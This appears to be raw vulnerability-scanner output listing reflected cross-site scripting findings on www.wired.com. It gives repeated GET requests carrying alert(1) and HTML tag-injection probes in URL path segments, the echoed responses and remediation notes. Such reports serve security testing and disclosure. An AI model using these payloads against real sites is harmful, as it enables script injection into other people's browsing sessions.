The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b056b"-alert(1)-"94be61696de was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art/multimedia/2008b056b"-alert(1)-"94be61696de/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Expires: Sun, 21 Nov 2010 22:09:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 21 Nov 2010 22:09:34 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53a9b"-alert(1)-"71d40f0ea48 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art/multimedia/2008/0753a9b"-alert(1)-"71d40f0ea48/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:35 GMT Date: Sun, 21 Nov 2010 22:09:35 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a570b"-alert(1)-"e4737c8dafd was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art/multimedia/2008/07/gallery_faves_fooda570b"-alert(1)-"e4737c8dafd HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:36 GMT Date: Sun, 21 Nov 2010 22:09:36 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb7b"><a>7ab8294467e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services3bb7b"><a>7ab8294467e/faq/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29341 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:53 GMT Date: Mon, 22 Nov 2010 01:08:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services3bb7b"><a>7ab8294467e ss_faq"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a2bc"><a>d55232de10d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/faq1a2bc"><a>d55232de10d/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29341 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_faq1a2bc"><a>d55232de10d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6abf1"><a>5ce90c983a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services6abf1"><a>5ce90c983a8/feedback/general HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Mon, 22 Nov 2010 01:12:54 GMT Date: Mon, 22 Nov 2010 01:09:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services6abf1"><a>5ce90c983a8 ss_feedback c_general"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 974da"><a>72d8e369572 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/feedback974da"><a>72d8e369572/general HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_feedback974da"><a>72d8e369572 c_general"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 905fe"><a>4b273f842e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/feedback/general905fe"><a>4b273f842e2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29368 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_feedback c_general905fe"><a>4b273f842e2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7e6f"><a>b5e2078d190 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicesb7e6f"><a>b5e2078d190/feedback/letterstowriter HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29384 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:50 GMT Date: Mon, 22 Nov 2010 01:08:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesb7e6f"><a>b5e2078d190 ss_feedback c_letterstowriter"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c26d"><a>82b196a60f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/feedback3c26d"><a>82b196a60f8/letterstowriter HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29384 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_feedback3c26d"><a>82b196a60f8 c_letterstowriter"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3f74"><a>339771d102 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/feedback/letterstowritere3f74"><a>339771d102 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Expires: Mon, 22 Nov 2010 01:09:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:29 GMT Content-Length: 29382 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_feedback c_letterstowritere3f74"><a>339771d102"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28bfa"><a>69123ab5c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services28bfa"><a>69123ab5c3b/newsletters HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Mon, 22 Nov 2010 01:12:20 GMT Date: Mon, 22 Nov 2010 01:08:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services28bfa"><a>69123ab5c3b ss_newsletters"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57f84"><a>3318db1ec93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/newsletters57f84"><a>3318db1ec93 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_newsletters57f84"><a>3318db1ec93"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6749"><a>f428b40f49e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicese6749"><a>f428b40f49e/press/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29345 Vary: Accept-Encoding Cache-Control: max-age=228 Expires: Mon, 22 Nov 2010 01:13:04 GMT Date: Mon, 22 Nov 2010 01:09:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicese6749"><a>f428b40f49e ss_press"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a33"><a>35aa5f03801 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/press55a33"><a>35aa5f03801/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29345 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_press55a33"><a>35aa5f03801"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6245"><a>f225322a9f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicesc6245"><a>f225322a9f4/privacy/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29349 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:48 GMT Date: Mon, 22 Nov 2010 01:08:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesc6245"><a>f225322a9f4 ss_privacy"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 174e6"><a>9e726a36c25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/privacy174e6"><a>9e726a36c25/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29349 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_privacy174e6"><a>9e726a36c25"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f307"><a>0464dae629d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services4f307"><a>0464dae629d/rss/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29341 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:13:18 GMT Date: Mon, 22 Nov 2010 01:09:18 GMT Connection: close
